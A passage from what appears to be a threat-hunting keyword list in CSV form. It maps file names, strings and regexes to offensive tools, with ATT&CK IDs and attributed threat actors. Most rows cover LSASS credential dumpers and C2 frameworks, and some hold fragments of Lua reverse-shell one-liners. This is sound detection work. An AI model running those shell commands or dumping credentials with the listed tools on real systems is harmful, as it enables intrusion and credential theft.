MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - 
Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","51406" "*LSASecretDefaultPassword*",".{0,1000}LSASecretDefaultPassword.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","51407" "*lsasecrets.py*",".{0,1000}lsasecrets\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","10","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","51408" "*-LSASecrets.txt*",".{0,1000}\-LSASecrets\.txt.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. 
This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","51409" "*lsasecretslive.py*",".{0,1000}lsasecretslive\.py.{0,1000}","offensive_tool_keyword","pysecdump","Python-based tool to dump security information from Windows systems","T1003.001 - T1081 - T1012 - T1005 - T1518.001","TA0006 - TA0007 - TA0043","N/A","Dispossessor","Credential Access","https://github.com/pentestmonkey/pysecdump","1","1","N/A","N/A","10","3","270","49","2020-06-22T04:16:16Z","2013-01-19T18:02:26Z","51410" "*lsass comsvcs*",".{0,1000}lsass\scomsvcs.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","51411" "*lsass direct*",".{0,1000}lsass\sdirect.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","51412" "*Lsass Dump File Created*",".{0,1000}Lsass\sDump\sFile\sCreated.{0,1000}","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. 
If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","N/A","9","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","51413" "*lsass dump from agent*",".{0,1000}lsass\sdump\sfrom\sagent.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","51414" "*LSASS dump might fail if RunAsPPL is enabled*",".{0,1000}LSASS\sdump\smight\sfail\sif\sRunAsPPL\sis\senabled.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","51415" "*lsass dump saved to: *",".{0,1000}lsass\sdump\ssaved\sto\:\s.{0,1000}","offensive_tool_keyword","DumpNParse","A Combination LSASS Dumper and LSASS Parser","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/icyguider/DumpNParse","1","0","#content","N/A","10","2","150","24","2021-11-21T14:25:24Z","2021-11-21T14:18:42Z","51416" "*Lsass minidump can be imported in *",".{0,1000}Lsass\sminidump\scan\sbe\simported\sin\s.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. 
an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#content","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","51417" "*LSASS minidump file for *",".{0,1000}LSASS\sminidump\sfile\sfor\s.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","51418" 
"*lsass.dmp*",".{0,1000}lsass\.dmp.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","51420" "*lsass.dmp*",".{0,1000}lsass\.dmp.{0,1000}","offensive_tool_keyword","lsass","Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly","T1110","N/A","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","51421" "*lsass.dmp*",".{0,1000}lsass\.dmp.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","51422" "*lsass.exe*.dmp*",".{0,1000}lsass\.exe.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","0","N/A","N/A","10","9","868","140","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z","51423" "*lsass.exe*C:\temp\tmp.tmp*",".{0,1000}lsass\.exe.{0,1000}C\:\\temp\\tmp\.tmp.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense 
Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","N/A","10","10","1633","292","2024-08-30T20:30:31Z","2021-11-02T15:02:42Z","51424" "*lsass_*.dmp*",".{0,1000}lsass_.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","51425" "*lsass_dump_*",".{0,1000}lsass_dump_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","51426" "*lsass_dump_lsassy_*",".{0,1000}lsass_dump_lsassy_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","51427" "*lsassdump.dmp*",".{0,1000}lsassdump\.dmp.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","51428" 
"*LsassDump_20*.ps1*",".{0,1000}LsassDump_20.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","PSSW100AVB","This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio","T1112 - T1562.001 - T1086 - T1548.002 - T1059.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/tihanyin/PSSW100AVB","1","1","N/A","N/A","N/A","10","1104","174","2025-01-28T10:47:44Z","2021-10-08T17:36:24Z","51429" "*lsassDumpRetryCount*",".{0,1000}lsassDumpRetryCount.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","51430" "*lsassdumps*",".{0,1000}lsassdumps.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","51431" "*LSASSProtectionBypass*/",".{0,1000}LSASSProtectionBypass.{0,1000}\/","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","N/A","10","10","1633","292","2024-08-30T20:30:31Z","2021-11-02T15:02:42Z","51433" "*LsassSilentProcessExit.cpp*",".{0,1000}LsassSilentProcessExit\.cpp.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - 
TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","N/A","10","5","445","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z","51434" "*LsassSilentProcessExit.exe*",".{0,1000}LsassSilentProcessExit\.exe.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","N/A","10","5","445","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z","51435" "*LsassSilentProcessExit.vcxproj*",".{0,1000}LsassSilentProcessExit\.vcxproj.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","N/A","10","5","445","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z","51436" "*LsassSilentProcessExit-master*",".{0,1000}LsassSilentProcessExit\-master.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","N/A","10","5","445","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z","51437" "*lsassy *",".{0,1000}lsassy\s.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","51438" "*lsassy -*",".{0,1000}lsassy\s\-.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - 
TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","51439" "*lsassy -v -*",".{0,1000}lsassy\s\-v\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","51440" "*lsassy.*",".{0,1000}lsassy\..{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","51441" "*lsassy.impacketfile*",".{0,1000}lsassy\.impacketfile.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","51442" "*lsassy/dumpmethod*",".{0,1000}lsassy\/dumpmethod.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","51443" "*lsassy_dump*",".{0,1000}lsassy_dump.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - 
T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","51444" "*lsassy_dump*",".{0,1000}lsassy_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","51445" "*lsassy_dump.py*",".{0,1000}lsassy_dump\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Exploitation tool","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","51446" "*lsassy_linux_amd64*",".{0,1000}lsassy_linux_amd64.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","#linux","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","51447" "*lsassy_logger.*",".{0,1000}lsassy_logger\..{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 
- T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","51448" "*lsassy_windows_amd64*",".{0,1000}lsassy_windows_amd64.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","51449" "*lsassy-linux-x64-*",".{0,1000}lsassy\-linux\-x64\-.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","#linux","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","51450" "*lsassy-MacOS-x64-*",".{0,1000}lsassy\-MacOS\-x64\-.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","51451" "*lsassy-windows-latest.zip*",".{0,1000}lsassy\-windows\-latest\.zip.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","51452" "*lsassy-windows-x64-*.exe",".{0,1000}lsassy\-windows\-x64\-.{0,1000}\.exe","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential 
Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","51453" "*lsattr -a /usr/bin/ /bin/ /sbin/ /usr/sbin/ 2>/dev/null*",".{0,1000}lsattr\s\-a\s\/usr\/bin\/\s\/bin\/\s\/sbin\/\s\/usr\/sbin\/\s2\>\/dev\/null.{0,1000}","offensive_tool_keyword","Orc","Orc is a post-exploitation framework for Linux written in Bash","T1059.004 - T1036.005 - T1070.002 - T1012 - T1082 - T1003 - T1555.003 - T1049 - T1134.001 - T1202","TA0005 - TA0003 - TA0002 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zMarch/Orc","1","0","#linux","N/A","9","4","395","53","2019-11-12T18:21:27Z","2018-08-16T11:31:39Z","51454" "*lse.sh -l*",".{0,1000}lse\.sh\s\-l.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","51455" "*lsecqt/OffensiveCpp*",".{0,1000}lsecqt\/OffensiveCpp.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","1","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","51456" "*lu4p/ToRat*",".{0,1000}lu4p\/ToRat.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","51460" "*lua 
-e*require('socket');*t:connect*os.execute('""/bin/bash"" <&3 >&3 2>&3');*",".{0,1000}lua\s\-e.{0,1000}require\(\'socket\'\)\;.{0,1000}t\:connect.{0,1000}os\.execute\(\'\""\/bin\/bash\""\s\<\&3\s\>\&3\s2\>\&3\'\)\;.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","51461" "*lua -e*require('socket');*t:connect*os.execute('""/bin/sh"" <&3 >&3 2>&3');*",".{0,1000}lua\s\-e.{0,1000}require\(\'socket\'\)\;.{0,1000}t\:connect.{0,1000}os\.execute\(\'\""\/bin\/sh\""\s\<\&3\s\>\&3\s2\>\&3\'\)\;.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","51462" "*lua -e*require('socket');*t:connect*os.execute('""bash"" <&3 >&3 2>&3');*",".{0,1000}lua\s\-e.{0,1000}require\(\'socket\'\)\;.{0,1000}t\:connect.{0,1000}os\.execute\(\'\""bash\""\s\<\&3\s\>\&3\s2\>\&3\'\)\;.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","51463" "*lua -e*require('socket');*t:connect*os.execute('""cmd"" <&3 >&3 2>&3');*",".{0,1000}lua\s\-e.{0,1000}require\(\'socket\'\)\;.{0,1000}t\:connect.{0,1000}os\.execute\(\'\""cmd\""\s\<\&3\s\>\&3\s2\>\&3\'\)\;.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 
- TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","51464" "*lua -e*require('socket');*t:connect*os.execute('""powershell"" <&3 >&3 2>&3');*",".{0,1000}lua\s\-e.{0,1000}require\(\'socket\'\)\;.{0,1000}t\:connect.{0,1000}os\.execute\(\'\""powershell\""\s\<\&3\s\>\&3\s2\>\&3\'\)\;.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","51465" "*lua -e*require('socket');*t:connect*os.execute('""pwsh"" <&3 >&3 2>&3');*",".{0,1000}lua\s\-e.{0,1000}require\(\'socket\'\)\;.{0,1000}t\:connect.{0,1000}os\.execute\(\'\""pwsh\""\s\<\&3\s\>\&3\s2\>\&3\'\)\;.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","51466" "*lua -e*require('socket');*t:connect*os.execute('""zsh"" <&3 >&3 2>&3');*",".{0,1000}lua\s\-e.{0,1000}require\(\'socket\'\)\;.{0,1000}t\:connect.{0,1000}os\.execute\(\'\""zsh\""\s\<\&3\s\>\&3\s2\>\&3\'\)\;.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","51467" "*lua -e*require('socket');*t:connect*os.execute('sh -i <&3 >&3 
2>&3');*",".{0,1000}lua\s\-e.{0,1000}require\(\'socket\'\)\;.{0,1000}t\:connect.{0,1000}os\.execute\(\'sh\s\-i\s\<\&3\s\>\&3\s2\>\&3\'\)\;.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","51468" "*lua5.1 -e*require(""socket"")*tcp:connect*io.popen*receive()*send()*",".{0,1000}lua5\.1\s\-e.{0,1000}require\(\""socket\""\).{0,1000}tcp\:connect.{0,1000}io\.popen.{0,1000}receive\(\).{0,1000}send\(\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- 